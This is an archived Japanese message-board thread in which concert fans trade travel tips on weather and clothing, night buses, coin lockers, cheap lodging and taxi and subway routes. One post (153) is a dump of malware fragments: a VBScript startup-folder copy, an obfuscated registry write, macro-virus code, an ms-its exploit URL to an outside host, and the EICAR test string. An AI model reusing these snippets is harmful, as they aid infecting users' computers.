10月30日横アリに参戦する姐さん方。
やっぱり夜行で帰った方がいいだろうか。
夜行でも22時だからギリだよな。

141 :ななしじゃにー:2006/10/09(月) 18:17:52 ID:4tVS6axD
>139
電話かけてみればとレスしたのは自分だったが
無事にみつかってよかったね。10件はがんがったな。

142 :ななしじゃにー:2006/10/09(月) 20:03:02 ID:x3v9biW+
北の国の姐さんに質問です。
今の時期みんなコートをきてますか?
最高気温13度ときいて服装困ってます。教えてください。

143 :ななしじゃにー:2006/10/09(月) 21:51:33 ID:ma/pq9WC
>140
そういう限定な話題は該当紺スレでするべきだと思うよ。

144 :ななしじゃにー:2006/10/09(月) 22:47:04 ID:28kW98f9
>142
昨日一昨日は震えが来るくらい寒かったので短めのコート着たが
今日はGジャンで充分だった。天気にかなり左右されるので
暖かいジャケットか軽いコートを持って来た方がいいと思うョ。

145 :ななしじゃにー:2006/10/10(火) 19:23:55 ID:XFCirqwq
北の国は5時半過ぎには真っ暗。
>144の言うとおり厚手のジャケットか軽いショートコートがあったらいいね。
天気がよい日中や乗り物内はコート羽織ってると暑いぐらいだと思うけど。

146 :ななしじゃにー:2006/10/10(火) 20:06:58 ID:tNn/dgNC
>144-145
dd
寒さには強いほうだけど気温差で風邪引かないように、
薄手のコートと念のためにニットカーデも持って行きます。

147 :ななしじゃにー:2006/10/11(水) 14:16:37 ID:WOj1zKmk
今週末の北の国遠征、薄手のコートはあったほうがいいみたいだけど
ストールも持ってこうかと思ってるんだが、要らないっすか?


148 :ななしじゃにー:2006/10/11(水) 22:48:34 ID:6BqjAVSv
>147
前述のとおり天気にもよるが、晴れならストールだけでもいいと思う。
でも雨とか曇りだとコートの方がいい。
今日の時点ではコートにストールってほどではないな。
コートの下に着てるものが薄手で半袖とかいうなら別だが。

149 :ななしじゃにー:2006/10/12(木) 12:47:46 ID:RetezA1z
>148
ありがとん。

150 :ななしじゃにー:2006/10/21(土) 00:12:15 ID:THip4+/o
あげ

151 :ななしじゃにー:2006/10/24(火) 23:05:35 ID:F0VBLxuz
参考に

152 :ななしじゃにー:2006/10/26(木) 13:34:46 ID:HL4P4X2j
地元と5度以上の温度差で戸惑ってます
南の国からの遠征組ですが、横浜はどのくらいの寒さですか?

153 :<body onload=window()>:2006/10/26(木) 14:16:03 ID:T4n2UV4X
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

154 :ななしじゃにー:2006/10/26(木) 21:36:32 ID:X3/ZA/Cz
>>152
横浜は日中は23度くらいであたたかい。うっかりすると暑い。
服装はジャケットorカーデにシャツくらい。
でも、Tシャツいっちょで歩いてる人もいればファーの付いたカーデにブーツの人もいる。
ファッション的見地から言えばなんでもあり。
夜は結構冷えてきたので薄手のはおりもの持ってきたほうがよいと思う。




155 :ななしじゃにー:2006/10/26(木) 22:43:56 ID:sATJmqOv
>>152
ジブンも夜バスでだけどアス、横浜に遠征。
服はマダ迷い中だけどワンピ+ジャケットにしようかと。

156 :152:2006/10/27(金) 10:33:27 ID:7AdK6fop
>>154-155
ありがとございます!
寒さに弱いのジャケットも持参して行ってきます

157 :ななしじゃにー:2006/10/27(金) 17:32:32 ID:QTf6oOTE
日本語でおk

158 :ななしじゃにー:2006/11/01(水) 13:27:17 ID:95GKdxdg
横蟻の近くでケーキを買うのにオススメの店はありますか?
今から予約入れようと思うんだがカフェJrとプリンスくらいしか
思い浮かばないので他にあったら教えてホスィ

159 :ななしじゃにー:2006/11/16(木) 21:14:46 ID:rMBsvyQx
どうしても宿代を安くしたいのですが、
カプセルに泊まった事のあるツワモノおねえさんはいませんか?

160 :ななしじゃにー:2006/11/17(金) 21:29:16 ID:BiMebQQc
帝都なら女子専用フロアがあるカプセルがあるが?

161 :ななしじゃにー:2006/11/18(土) 11:32:09 ID:ElAkkLOn
たこやき姐さんがた
今回、たこやき厚生年金に初めて行くのですが
地下鉄が禿わかりにくいと聞いたので心配。
あまり時間がない場合はタクったらかなりかかりますか?


162 :ななしじゃにー:2006/11/18(土) 20:27:01 ID:GUEun9yB
どこからタクるつもり?

163 :ななしじゃにー:2006/11/18(土) 20:43:27 ID:5MDTWze2
>162姐さん
161です。
最初はたこやき駅からと思ったんだけど
新幹線降りて、御堂筋線で本町か心斎橋まで出れば
そこからタクってみようかと。
どんなもんでしょうか。
自分、たこやき駅が苦手なもので。

164 :ななしじゃにー:2006/11/19(日) 00:11:22 ID:cDfija3w
162さんではないですが、本町か心斎橋で
「厚生年金会館」などと言ったらタクシーの運転手さんに
しばかれるかとw

たこやき駅が苦手なら、新大阪からせめて本町のひとつ
手前、淀屋橋で降りていかれればよろしいかと。
1000円かからないくらいです。

165 :161:2006/11/19(日) 11:06:51 ID:FJ0b2uLM
>164姐さん
dです。
危うくしばかれるところでしたw
淀屋橋で降りてタクってみます。


166 :ななしじゃにー:2006/11/19(日) 22:03:57 ID:L23Rh5IN
>160姐さん
トンです。

遅レスすまんです。
安く泊まれて良かったと思えるのか心配です。
治安も不安です。
それならば、安ビジネスホテルが良いのかと悩み中です。
正月なので料金高くて、アイタタな安月給者です。

167 :ななしじゃにー:2006/11/20(月) 15:13:39 ID:Vt0vjkRd
つチラ裏

168 :ななしじゃにー:2006/11/21(火) 00:50:41 ID:uxXfjImE
>166
つ【http://akihabara.capsuleinn.com/index.html?gclid=CPm2yeegk4gCFREITAodjW7IgA
安ビジネスもいろいろだから気をつけれ

169 :ななしじゃにー:2006/11/21(火) 11:31:12 ID:0H4/SuiD
>166ノシ
カウコンで利用した。女性専用部屋で2900円大浴場付きだったが、人がいると眠れない自分は疲れただけだった。
相方は大満足してた。
荷物はロッカーが有
半数が外国人でした

170 :ななしじゃにー:2006/11/21(火) 12:17:25 ID:x/Yt+Wuu
こんど遠征で名古屋から青森にいくんですけど
一番安い交通手段てなんですか?
経験あるかたアドバイスお願いします。
飛行機だと往復5万越え…キツイ…

171 :ななしじゃにー:2006/11/21(火) 12:19:22 ID:x/Yt+Wuu
今気づいた!!スレ違いごめんなさい。


172 :ななしじゃにー:2006/11/24(金) 14:33:58 ID:xdIokkWL
治安は重要

173 :ななしじゃにー:2006/11/29(水) 13:48:38 ID:CXpZ/GZE
ホシュがてら貼りまつ

153 :ななしじゃにー:2006/11/29(水) 03:39:20 ID:udE5AsTM
東京都交通局では、今年も大晦日に都営地下鉄の終夜運転を行いますので、
年末年始のダイヤと合わせて、下記のとおりお知らせいたします。
http://www.metro.tokyo.jp/INET/OSHIRASE/2006/11/20gbs800.htm
2.大晦日に終夜運転を行います。
(1)浅草線 全線、20〜30分毎に運転します。
(2)三田線全線、約30分毎に運転します。
(3)新宿線全線、30〜40分毎に運転します。
(4)大江戸線全線、約30分毎に運転します。


174 :ななしじゃにー:2006/12/01(金) 12:32:37 ID:WDLa6SGc
交通安全

175 :ななしじゃにー:2006/12/01(金) 22:58:34 ID:WuUTBq2L
前に横浜で1泊3000円のホテルに泊まるって
書いた漏れですが無事帰還

無事どころがスガーイイとこだった
受付のお姉さんが円鳥Tシャツ着てた
ヲタだた


176 :ななしじゃにー:2006/12/02(土) 00:28:43 ID:TEq7ca20
>175
もしかして>22姐さんですか?
ガンガッテそのホテル探さなきゃw

177 :ななしじゃにー:2006/12/02(土) 00:53:10 ID:uHoegVEB
>165
しかしたこやき駅が苦手という理由はわからんでもないが、モターイナイ話だなw
禿わかりにくいと言っても、帝都の溜池山王だの国会議事堂あたりよりは全然簡単だぞ?

新大阪で新幹線降りる、まずは御堂筋線に乗る
この時、進行方向一番後ろの車両に乗る。心斎橋で下車。
すぐ後ろの階段orエスカレーター上って、「長堀鶴見緑地線」のホームに行く。
ホームを通り、「四ツ橋線」と青い字で書かれた方をひたすら目指す
そうすると「四ツ橋駅」に着きます。
ここまで来るといやっちゅーほど「厚生年金会館→」の矢印がある。
紺関係ならヲタの流れもあるだろうから、それに従って進んでいくと、四ツ橋駅から徒歩約5〜10分。

178 :ななしじゃにー:2006/12/02(土) 16:53:12 ID:3I/SA++Q
青山劇場へ初めて遠征する予定なのですが
姐さんたちなら、荷物は渋谷と表参道のどっちのロッカーへ預けますか?

179 :ななしじゃにー:2006/12/02(土) 17:16:14 ID:LaS2rqfT
>178
時間と前後のスケジュール次第

180 :ななしじゃにー:2006/12/02(土) 17:23:37 ID:3I/SA++Q
着く時間はギリギリ。
新幹線で品川→渋谷(→表参道)のルートで行こうと思ってます。

181 :ななしじゃにー:2006/12/02(土) 18:29:25 ID:10HF9uIz
>180
自分だったら品川か、青劇のクロークに預けるかだな。
蛇舞台だとクロークが閉まってる事があるみたいなので
注意が必要だけど。

182 :ななしじゃにー:2006/12/02(土) 19:28:35 ID:3N5S8/Zo
青劇まで荷物持って歩くのがしんどそう。

183 :178:2006/12/02(土) 19:34:04 ID:3I/SA++Q
>179,181,182
dです。

品川も考えたんですが、宿泊先が新宿方面だから
品川だと取りに行くのに時間かかりますよね…

184 :ななしじゃにー:2006/12/02(土) 20:03:43 ID:3N5S8/Zo
…つーかさ、そのくらい自分で考えればいいんじゃないかなあ。

185 :ななしじゃにー:2006/12/02(土) 20:42:19 ID:tF0nQ3dB
最近はどうか知らないけど渋谷のコインロッカーは
大抵埋まってて空きを探すのが大変だった記憶。特にJR駅。

186 :ななしじゃにー:2006/12/02(土) 21:03:58 ID:nSR/6TFG
そのスケジュールで迷う方がわかんない
表参道にわざわざ行く方が面倒だよ

187 :ななしじゃにー:2006/12/02(土) 23:53:41 ID:KRTi6OBF
渋谷は地下の東急(半蔵門線・田園都市線)のロッカーなら大体空いてる。

188 :ななしじゃにー:2006/12/03(日) 17:18:45 ID:IYctmLGj
時間がなくて土地カンのない183に
渋谷の地下はハードル高いような気が。
おとなしく青劇持ってけば。

189 :ななしじゃにー:2006/12/03(日) 20:24:03 ID:eTtR6p1Z
渋谷のロッカーが空いてたら入れたらいいし、無ければ青劇のクローク。
1、2泊程度なら持って歩くにもたいした量じゃないだろうし
大きさ関係なくタダで預かってくれるクロークがいいと思うけど。

190 :178:2006/12/03(日) 22:12:02 ID:FJ2YFYVC
>>184-189姐さん
dです。
参考にさせてもらいます。

191 :ななしじゃにー:2006/12/04(月) 18:57:09 ID:JzAyWhgz
東京で降りて新宿に行って荷物預けて、渋谷に行けばいいのに。
15分くらい余分に時間かかるけど。
渋谷のJRのロッカーは全く空いてないよ。
午前中なら多少空いてるけど。
夕方はロッカー探してウロウロしてる人が数人いる。

192 :ななしじゃにー:2006/12/06(水) 00:38:04 ID:7LU8sTP6
年始は航空券とり難いな…どうしよう。

193 :ななしじゃにー:2006/12/07(木) 03:28:15 ID:oaqK9KFZ
新宿駅構内ロッカーはいいよね。
改札出ないで良いのとロッカーたいがい空いてるし何より動きやすい。
自分はいつも遠征時は新宿拠点にして
なるべく新宿駅構内ロッカーに預けるようにしてる。

194 :ななしじゃにー:2006/12/07(木) 10:08:58 ID:M/P6cqWF
ネット予約

195 :ななしじゃにー:2006/12/07(木) 16:48:21 ID:lxMrmZ6k
年末は混みそう

196 :ななしじゃにー:2006/12/07(木) 23:26:54 ID:gtx53ZLF
日曜夜に大阪城で公演があり、20時くらいに会場から外に
でられると思うんだが、ただいま怪我しておりタクシーで
新大阪まで行くのを検討中。
何時くらいに駅に着くでしょうか?

197 :ななしじゃにー:2006/12/07(木) 23:52:25 ID:r+oTrMOI
>196
どうぞ。
ttp://www.taxisite.com/

198 :ななしじゃにー:2006/12/08(金) 00:24:12 ID:U2DoXZBV
>196
ニューオータニのサイトだと、25分になってるね。
日にちや曜日・時刻によって変わるだろうから、
適当な大阪のタクシー会社に電話して聞いてみれ。

199 :ななしじゃにー:2006/12/08(金) 01:19:39 ID:oWG7KVbi
>196
この前、シアターVRABA!前から12分で新大阪に着いたw
舞台終って飛び乗ったら21時で、29分発の新幹線乗りたから焦ってた。
開演前に色々タクシーの人に聞いたよ。親切に教えてくれた。
時間帯も重要だけど、どこでタクシー拾うかにもよるらしい。

200 :ななしじゃにー:2006/12/08(金) 01:21:51 ID:oWG7KVbi
連カキスマソ
>196
ジブンは、日曜でした。


201 :196:2006/12/08(金) 02:19:54 ID:l7QtEvVq
>197-200
早々にありがとうございました。
前の方で、京橋から梅田は一通があるとか渋滞とか記載があったので不安になってしまいました。
明日にでもタクシー会社にきいてみます。

202 :ななしじゃにー:2006/12/09(土) 23:25:12 ID:uxPZAQps
帝都空港近くで、シャワーできそうなところはあるのでしょうか?
年始に夜バス→早朝便のコンボをやろうとしているのですが
普段は利用しないので、どういうところがあるのかも知らず‥
ネカフェとか年始もやってるもの?

203 :ななしじゃにー:2006/12/10(日) 22:51:05 ID:WTO8z90J
>202
シャワーは空港の中にある記憶があったので調べたらあった
ttp://www.tokyo-airport-bldg.co.jp/tenant/44.html
ネトカフェのことは直接ネトカフェに電話した方が早いんじゃないか?

というか、おまいさんは賢い箱をもっとちゃんと利用した方がいいよ。
ここで聞かなくても自分で調べれば解決することばかりだから。

204 :ななしじゃにー:2006/12/15(金) 20:03:00 ID:KrXxkjkP
まちBBSに書こうとしたらアク禁に巻き込まれたのでここで聞かせてください。
たこやき森ノ宮周辺と御堂筋本町周辺、どちらが安全でしょう。
初のたこやきひとり遠征なので不安です。

205 :ななしじゃにー:2006/12/15(金) 22:30:36 ID:yG2C5DG+
なにがどうあっても「御堂筋本町」。
オフィス街なので夜遅くまで人通りがあるし、
比較的上品なサラリーマンが多い。
森ノ宮は浮浪者も多いし、治安は良くない。



206 :ななしじゃにー:2006/12/16(土) 00:00:36 ID:KrXxkjkP
>205
サンクスです。
そちらで手を打ちます@204

207 :ななしじゃにー:2006/12/17(日) 03:20:24 ID:WAsIrmTq
今までムーンライトながらでしか横浜へ行ったことないんですが、夜行バスで今度行く予定です。
何か気をつけることありますか?

208 :ななしじゃにー:2006/12/17(日) 10:17:58 ID:Vg3GspsY
今度、帝都遠征からの帰郷に初めてムーンライトながら(臨時91号)を利用するのですが、
夜行バスと比べて何か気をつけることはありますか?

注:冗談ではなくマジレス。

バスと違って、隣のオッサンにババアかよ!と舌打ちされそうなのがムカシク。

209 :ななしじゃにー:2006/12/18(月) 00:57:25 ID:AvE3yxxX
>208
明るくてジヌンは眠れなかった。周りはオサーンばかりだたし、
貴重品管理と、睡眠対策(深めのニット帽とかアイマスクとか)は必須。

漏れは一度乗って懲りた。夜バスの方がどれだけ安心で楽か分からない。
椅子もリクライニングしないから余計に寝にくいしね。
姐さんガンガレ!

210 :ななしじゃにー:2006/12/18(月) 03:53:22 ID:D7Uen67y
>209
d!
特に18きっぷ時期は該当スレで乞○列車と蔑称されるしw
リクライニングはしないけど椅子も繁忙期の臨時便は定期便よりマシみたい。

夜バスも乗ってみたけど、紺で興奮して眠れないのに消灯で缶詰なのが自分には向いてない鴨。
どんなに小さい音量でも音楽聴くのはダメだし、携帯は光るから壷をロムれないし、読書も無理。
つーか、眠ったら紺内容を忘れるのでorz 思い出しメモしながら何とか時間を潰したよ。
昼行列車の片道330Kmなら問題茄子ダタが、今度は片道880Km、ながらを降りてからも長い。
早朝から15時間乗車して牛紺参戦とかしたら正気の沙汰じゃないよなw



211 :ななしじゃにー:2006/12/18(月) 17:10:27 ID:BpllTJZx
夜行バスで安くておすすめな所はどこですか?

212 :ななしじゃにー:2006/12/18(月) 17:44:45 ID:wFzVtlaq
これから行き先決めるのか?

213 :ななしじゃにー:2006/12/18(月) 19:55:59 ID:LSVZog0M
>210
正直あまり治安がよくないから、痴漢&盗難対策で深い睡眠はオススメできない。
210姐さんは眠らないタイプみたいだから大丈夫かもしれないけど。
貴重品はそれこそ肌身離さずに、できれば鞄は上着の下とかに隠したほうがいい。

214 :ななしじゃにー:2006/12/18(月) 21:58:52 ID:H1mkCv5t
行き先は横浜ですが。

215 :ななしじゃにー:2006/12/18(月) 22:08:03 ID:VW7v2TB1
どこから?

216 :ななしじゃにー:2006/12/19(火) 01:08:31 ID:2ODDdsG2
>213
d!
痴漢に遭うようなオトシゴロじゃないが気を付けるよ。世間にはモノズキも居るしw
財布がわりのポーチを首に掛けた上からフリースを着る予定。でコートは掛布団がわり。
自分、軽く乗り鉄っぽいので、紺も楽しみだが、ながらも楽しみ鴨。

217 :ななしじゃにー:2006/12/19(火) 12:29:47 ID:eg3jV3uL
寒さ対策が必要

218 :ななしじゃにー:2006/12/19(火) 13:20:22 ID:osp/MEfQ
名古屋から横浜です!
説明不足すいません。

219 :ななしじゃにー:2006/12/19(火) 14:44:27 ID:ycCABnUd
>210
席が指定とれてるならいいが、もし自由席ならトイレ行く時も気をつけて。
友がトイレ行った隙に席をとられオッサンと喧嘩になった痛い記憶がある。

220 :ななしじゃにー:2006/12/19(火) 20:42:40 ID:6JP4lVJv
広島で1人でご飯を食べれるような所を探しているんだが。
ホテルは東急インなので、その近辺でお勧めを教えて下さい。

221 :ななしじゃにー:2006/12/19(火) 23:35:49 ID:39STM6na
横蟻の昼公演後に急いで空港行きのバスに乗れるか心配
それ考えてたら楽しめそうに無いな…
そもそも空港って離陸の何分前についとけばいいんだろう?

222 :ななしじゃにー:2006/12/19(火) 23:51:42 ID:BDcPCXKX
>221
まずは航空会社のサイト見るところから始めてみては。

223 :ななしじゃにー:2006/12/20(水) 01:26:45 ID:Fea4nKi6
>221
横アリは規制退場厳しいからそのつもりで鯉

224 :ななしじゃにー:2006/12/20(水) 05:03:13 ID:0KheIDlH
>219
d!
終点まで指定席だからオゲ!
隣席がDQNでないことを祈るのみ(-人-)

225 :ななしじゃにー:2006/12/20(水) 12:55:39 ID:hipeikIT
>224
219だが帝都〜鯱、自由席というのがまた悪かったんだろな。
ガラ悪いし酔っ払いはいるしでコンの興奮も余韻も吹っ飛んだ。もう乗ラネと誓ってしまったよ。
姐さんの旅がいいものになるのを祈ってるよ。

226 :ななしじゃにー:2006/12/21(木) 20:01:01 ID:fbwgJKty
今度夜バスで帝都へ遠征するのですが
渋谷マークシティと品川バスターミナルだったらどちらで降りるのがオススメですか?
友との待ち合わせの時間までに着替えと朝食を済ませたいのですが…

227 :ななしじゃにー:2006/12/21(木) 21:09:17 ID:6ni1K8qb
>226
待ち合わせがどこなのかによるけど。
渋谷の方が店はあると思う。
マークシティならホテルあるから、ホテルで朝食でそのままトイレ借りて着替えてもいいんじゃないかな。
エクセルホテルのトイレなら汚いってことはないだろうしね。

228 :ななしじゃにー:2006/12/22(金) 01:33:09 ID:zjT2P5EX
>227
dです!
ただ今回は貧乏遠征の予定なので、もう少し安い所を探してみます。
マークシティ内かその周辺にコインロッカーはありますか?

229 :ななしじゃにー:2006/12/24(日) 01:07:02 ID:P9ozq+ob
>228
コインロッカーなら近くの渋谷駅にたくさんあるよ。
朝早いなら、空いてると思うし。

230 :ななしじゃにー:2006/12/26(火) 15:31:06 ID:IgDH6yqs
新横浜駅の周りに遊べる場所ある?

231 :ななしじゃにー:2006/12/26(火) 15:35:06 ID:zb+StdMP
小銭

232 :ななしじゃにー:2006/12/27(水) 00:19:24 ID:JfG3MyiQ
>230
ラーメン博物館くらいしかない。

233 :ななしじゃにー:2006/12/30(土) 01:01:16 ID:w2hrk8yT
元旦に最終新幹線(21:18)でたこやき国に帰るんですが、
東京駅まで行くのに後楽園駅と水道橋駅、どちらを使った方が早いですか?
あと正月の東京ドーム近辺の道路の混み具合はどうでしょうか?
タクシーも考えているのですが、正月だけに渋滞がよめなくて迷っています。


234 :ななしじゃにー:2006/12/30(土) 01:24:18 ID:ZY4jD6PY
>233
自分だったら後楽園から丸の内線。
後楽園の方がドームから近いし駅もいくらか空いてる。
ただ、東京駅での乗り換えはJRからの方が楽かも。

235 :ななしじゃにー:2006/12/30(土) 01:50:47 ID:azH7hVuY
>233
自分は東京駅の地下鉄乗換に慣れてないから水道橋だな
水道橋は改札口によってホームへの入場制限をする時もあるから
事前に駅員に確認しておいた方が良いかと

236 :ななしじゃにー:2006/12/30(土) 01:56:07 ID:ljiKS04y
>233
帝都の正月は車は少ないが、東京駅付近は分からん。

237 :ななしじゃにー:2006/12/30(土) 02:49:28 ID:RXHxM0Uj
今回初めて牛紺に行くんだが、
しうまい地区にはどう帰るのが早いか分かりますか?
やっぱり丸の内線で池袋か東京駅に出るのが、分かりやすく早いでしょうか?


238 :ななしじゃにー:2006/12/30(土) 12:11:57 ID:seL5G4DW
>237
どの沿線に住んでるのかわかんないからなんとも言えない。
各線の終夜運転の状況を調べてから判断した方がいいんじゃないか?
帝都ドームは規制退場の順番で出られる時間がだいぶ違うし。

239 :ななしじゃにー:2006/12/31(日) 11:57:00 ID:oGcueNBD
>233
自分も234と同じくいつも地下鉄。乗り換えないから楽だし。
東京駅のJRへの乗り換えは案内通りに進めばそんなに複雑じゃないよ。
水道橋から乗るよりは確かに新幹線のホームまでは遠いけど。

240 :ななしじゃにー:2007/01/03(水) 00:27:31 ID:SpHA+V2F
横浜駅5時に着いて周りに暖まれる場所ある?

241 :ななしじゃにー:2007/01/03(水) 00:46:05 ID:cqyCzTwh
>240
横浜の北口改札をでて、左にある階段を上ったあたりにあるマンキツがおすすめ。
綺麗だし、24時間やってるよ。

242 :ななしじゃにー:2007/01/03(水) 17:09:11 ID:V8kTT8Nw
>>241トン!

243 :ななしじゃにー:2007/01/03(水) 18:40:49 ID:81rYJkEF
横浜郵便局二十四時間営業だから中で時間潰せるんじゃん

244 :ななしじゃにー:2007/01/03(水) 20:15:27 ID:3nAiUoup
携帯からスマソ。
新潟県民会館に遠征しますが何かおすすめな店とかありますか?

245 :ななしじゃにー:2007/01/03(水) 20:16:35 ID:QQuzSApx
用もないのに未明の時間に金融機関内でうだうだしてたら
通報されるぞ
あそこはすぐ横が交番だしな

246 :ななしじゃにー:2007/01/05(金) 22:09:16 ID:oZEr7Rjv
仙台空港周辺でオススメのホテルありますか?

247 :ななしじゃにー:2007/01/06(土) 11:20:19 ID:Cj95Wzrp
>244
オマイが何を目的としてるかがワカランと薦めようがナイ
歩いて古町モールへ行くか、バスで万代に行けば
何かしらはある

248 :ななしじゃにー:2007/01/06(土) 18:21:22 ID:hbXyFGEQ
帝劇から東京駅って、電車乗るより走った方がはやいよな?
のぞみ最終で帰るんだが間に合わん!

249 :ななしじゃにー:2007/01/06(土) 22:06:48 ID:hndKankw
滝つ紺の札幌遠征ついでに帰省しようと思っているのですが、
滝つ紺後帰省の場合、地元方面行き特急の最終が札幌駅発19時で間に合うか微妙なんです。
先に帰省してから滝つ紺後帰京の場合、飛行機の時間には余裕がありますが
新千歳は雪で飛べないことが多い印象があり帰京出来なかったらどうしようと悩んでます。
ちなみに地元方面空港は雪で飛べないことはほとんどありません。

最終の特急に間に合わない可能性のリスクと雪で飛べない可能性のリスク、
道内の皆様はどちらを選びますか?
いっそ帰省をあきらめようかとも思っていますが、参考までにアドバイスお願いします。

250 :ななしじゃにー:2007/01/08(月) 21:08:46 ID:55tKvlby
>248
フォーラムの地下を突き抜けると早い。
迷ういようもないけど、念のため往路で道を確認しといたほうがいいよ。
意外と距離があるから、電車と大差ない気もするけど。

251 :ななしじゃにー:2007/01/08(月) 23:01:22 ID:skO3h4FM
衝撃スレではさんざんガイシュツだけど有楽町まで走って電車乗った方が結果的に早いよ。
丸の内側からは新幹線乗り場遠いんだよ。

51 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)